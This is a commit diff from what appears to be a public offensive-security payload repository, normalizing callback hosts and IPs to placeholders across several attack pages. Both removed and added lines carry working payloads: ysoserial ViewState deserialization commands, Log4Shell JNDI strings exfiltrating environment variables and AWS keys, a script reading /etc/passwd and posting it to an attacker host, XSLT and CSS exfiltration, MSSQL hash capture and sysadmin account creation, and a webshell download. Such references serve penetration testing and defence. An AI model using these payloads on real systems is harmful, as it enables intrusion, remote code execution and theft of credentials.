Normalize commands, callbacks and references

Author: swisskyrepo

API Key Leaks/IIS-Machine-Keys.md

@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
     ```
 
 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
 ### MAC Is Not Enabled
 
 ```ps1
-ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
+ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
 ```
 
 ### MAC Is Enabled And Encryption Is Disabled
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 
     # --generator = `__VIEWSTATEGENERATOR` parameter value
     # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
     ```
 
 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
     ```
 
 ## Edit Cookies With The Machine Key

Account Takeover/README.md

@@ -33,17 +33,17 @@
 ### Account Takeover Through Password Reset Poisoning
 
 1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
 3. Forward the request with the modified header
 
     ```http
     POST https://example.com/reset.php HTTP/1.1
     Accept: */*
     Content-Type: application/json
-    Host: attacker.com
+    Host: [ATTACKER.DOMAIN.TLD]
     ```
 
-4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
+4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
 
 ### Password Reset via Email Parameter
 
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
 
     ```powershell
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: 
     ```
 
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 
     0
 
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: X
     ```
 
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
 
 ### Account Takeover via JWT
 
-JSON Web Token might be used to authenticate an user.
+JSON Web Token might be used to authenticate a user.
 
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature

CONTRIBUTING.md

@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
 
 - Payloads must be sanitized
     - Use `id`, and `whoami`, for RCE Proof of Concepts
-    - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
+    - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
     - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
     - Use `Administrator` for privileged users and `User` for normal account
     - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples

CSS Injection/README.md

@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
 
 ```css
 input[name="pin"][value="1234"] {
-  background: url(https://attacker.com/log?pin=1234);
+  background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
 }
 ```
 
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
 
 ```css
 input[name="csrf-token"][value^="a"] + input {
-  background: url(https://example.com?q=a)
+  background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
 }
 ```
 
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
 This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
 
 ```html
-<style>@import url(http://attacker.com/staging?len=32);</style>
-<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
+<style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
+<style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
 ```
 
 Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.

CSV Injection/README.md

@@ -76,7 +76,7 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
 So one can test blind formula injection or a potential for data exfiltration with:
 
 ```text
-=IMPORTXML("http://[REDACTED]/csv", "//a/@href")
+=IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
 ```
 
 Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.

CVE Exploits/Log4Shell.md

@@ -45,63 +45,63 @@ bundle:config:db.password
 
 ## Scanning
 
-* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+* [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
 
     ```powershell
     usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
                         [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
-    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
-    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+    python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
+    python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
     ```
 
 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
 
 ## WAF Bypass
 
 ```powershell
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
 
 # using lower and upper
-${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
-${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
+${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
 
 # using env to create the letter
-${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
 ```
 
 ## Exploitation
 
 ### Environment variables exfiltration
 
 ```powershell
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
 
 # AWS Access Key
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
 ```
 
 ### Remote Command Execution
 
-* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+* [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
 
     ```ps1
-    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
-    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
-    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
-    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
-    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+    java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
+    Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
+    Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
+    Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
+    Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
     ```
 
-* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+* [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
 
 ## References
 
-* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
-* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
-* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)

Command Injection/README.md

@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
 
     ```ps1
     # -o, --output <file>        Write to file instead of stdout
-    curl http://evil.attacker.com/ -o webshell.php
+    curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
     ```
 
 ### Inside A Command

Headless Browser/README.md

@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
   async function getFlag(){
     response = await fetch("file:///etc/passwd");
     flag = await response.text();
-    fetch("https://attacker.com/", { method: "POST", body: flag})
+  fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
   };
   getFlag();
 </script>
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
 * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
 * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
 * Data stored in the settings (username, passwords, token): `chrome://settings`
-* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>`
+* Port Scan: In a loop open `http://localhost:<port>/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=<port>`
 * Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
 
     ```json

SAML Injection/README.md

@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
           <xsl:template match="doc">
             <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
             <xsl:variable name="escaped" select="encode-for-uri($file)"/>
-            <xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
+            <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/>
             <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>
             <xsl:value-of select="unparsed-text($exploitUrl)"/>
           </xsl:template>

SQL Injection/MSSQL Injection.md

@@ -304,36 +304,36 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
 
     ```powershell
-    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
+    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
     ```
 
 * **Permission**: Requires the `CONTROL SERVER` permission.
 
     ```powershell
-    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
-    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
+    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
+    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
     ```
 
 ### MSSQL UNC Path
 
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
 
 ```sql
-1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
+1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';-- 
 ```
 
 ```sql
-xp_dirtree '\\attackerip\file'
-xp_fileexist '\\attackerip\file'
-BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
-BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
-RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
-RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
-RESTORE LABELONLY FROM DISK = '\\attackerip\file'
-RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
-RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+xp_dirtree '\\10.10.10.10\file'
+xp_fileexist '\\10.10.10.10\file'
+BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
+BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
+RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
 ```
 
 ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
     select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
 
     -- Create a SQL user and give sysadmin privileges
-    EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
-    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+    EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
+    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
     ```
 
 ## MSSQL Privileges
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
 ### MSSQL Make User DBA
 
 ```sql
-EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
 ```
 
 ## MSSQL Database Credentials